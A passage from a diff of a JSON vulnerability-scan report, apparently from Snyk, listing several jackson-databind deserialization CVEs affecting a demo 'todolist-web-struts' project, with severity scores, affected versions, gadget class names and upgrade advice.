Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": 